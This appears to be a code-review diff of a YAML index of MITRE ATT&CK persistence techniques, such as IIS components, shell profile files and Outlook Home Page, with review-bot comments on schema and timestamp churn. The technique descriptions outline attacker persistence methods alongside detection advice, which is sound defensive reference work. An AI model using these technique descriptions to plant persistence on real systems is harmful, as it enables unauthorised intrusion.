- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33800,13 +34211,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33859,8 +34268,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33908,78 +34317,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34027,6 +34369,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -34037,9 +34383,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -34048,8 +34398,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
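Review bot: within the re-emitted `external_references` for T1546.004 the only substantive change is the `bencane blog bashrc` entry, whose `url` now points to a web.archive.org snapshot with a new retrieved date (September 25, 2024); the remaining 60-odd lines are the same references in a different order. Swapping a dead link for an archived copy is the right fix, but it is buried in reorder churn here; emitting references in a deterministic order (for example by `source_name`, or preserving upstream order) would let a reviewer see the one-line change directly.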
@@ -34086,7 +34495,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34109,12 +34518,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
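Review bot: T1547.002 keeps `x_mitre_attack_spec_version: 2.1.0` (unchanged context line) while `spec_version` is dropped, so this object is neither upgraded to 3.2.0 like T1547.006 and T1078 nor stripped of the key like KernelCallbackTable. Three different end states for the same key in one regeneration point to mixed source data; please confirm the input bundle and, if 2.1.0 objects are expected to remain, say so in the PR description.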
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -34192,41 +34600,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
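Review bot: this is the same pattern as the T1137.003 hunk: every removed key for T1137.004 (`id`, `type`, `created`, platforms, domains, marking, external_references) is re-emitted in the following hunk, the platform becomes `Office Suite`, and `x_mitre_permissions_required` (`Administrator`, `User`) is dropped without replacement. Whatever decision is made on retiring `x_mitre_permissions_required` for Outlook Forms should be applied and documented for Outlook Home Page as well, so the two sibling sub-techniques do not diverge.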
@@ -34235,27 +34613,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
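Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) is removed from T1137.004 together with `spec_version`, and nothing replaces it; unlike `x_mitre_platforms` and `x_mitre_domains`, which only change position, this is a genuine field drop. Anything that filters this index on required privileges will stop matching this technique, so the PR description should call it out as an upstream schema change (the attack spec version bumps 2.1.0 to 3.2.0 in the same hunk) rather than an incidental reordering. The `x_mitre_deprecated: false` and `revoked: false` additions are fine and match the other techniques in this diff.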
@@ -34316,7 +34721,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
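Review bot: the only change in this hunk is dropping `spec_version: '2.1'` from T1574.009, and the same line is removed from nearly every technique below. `spec_version` is a required common property on STIX 2.1 domain objects, so after this change the embedded `technique` maps are no longer self-describing STIX 2.1 objects; tooling that loads them through a STIX 2.1 parser will reject them or treat them as 2.0. Confirm that the upstream export intentionally omits the property and say so in the commit message.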
@@ -34360,7 +34764,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
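Review bot: `modified` for T1037.005 goes backwards, from 2022-05-11 to 2022-04-20, and the same pattern recurs throughout this diff (T1574.009 above; T1037.003, T1197, T1546.010, T1543.001, T1505, T1547.007, T1574.002, T1037.001 and T1547.008 below). Nearly all of the replaced values share the `.188Z` suffix, most of them exactly `T14:00:00.188Z`, which looks like a batch-stamped value rather than the object's real modification time, whereas the new values carry distinct sub-second timestamps. That is plausible for a re-sync from a different export, but a consumer that uses `modified` for newer-than comparisons will see these objects as regressions, so the commit message should state which export these timestamps now come from.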
@@ -34382,7 +34786,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34463,7 +34866,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -34486,7 +34888,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34516,12 +34918,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
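Review bot: T1037.003 loses `x_mitre_attack_spec_version: 2.1.0` along with `spec_version` and, unlike the other techniques in this diff, gets no replacement value; the same happens to T1037.001 further down. Every other technique here ends up with an explicit `x_mitre_attack_spec_version` (2.1.0, 3.1.0 or 3.2.0), so a consumer that reads the key unconditionally will hit a missing key on these two. Either emit the value the upstream object carries or handle its absence in the generator, and note the discrepancy in the PR.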
@@ -34611,12 +35011,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34701,7 +35100,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34766,18 +35164,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34810,10 +35207,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
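Review bot: the platform list for T1556.009 drops `SaaS` as well as `Azure AD`, leaving `IaaS` and `Identity Provider`; the Azure AD to Identity Provider move is a rename, but removing SaaS narrows the technique's scope, and the version only moves 1.0 to 1.1. Confirm that this mirrors the upstream object rather than the generator dropping a platform it does not map, since anything that builds per-platform views from this file will silently lose the technique under SaaS.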
@@ -34850,7 +35246,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34924,7 +35319,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34952,12 +35347,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -35016,33 +35410,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35063,6 +35434,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -35077,52 +35449,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
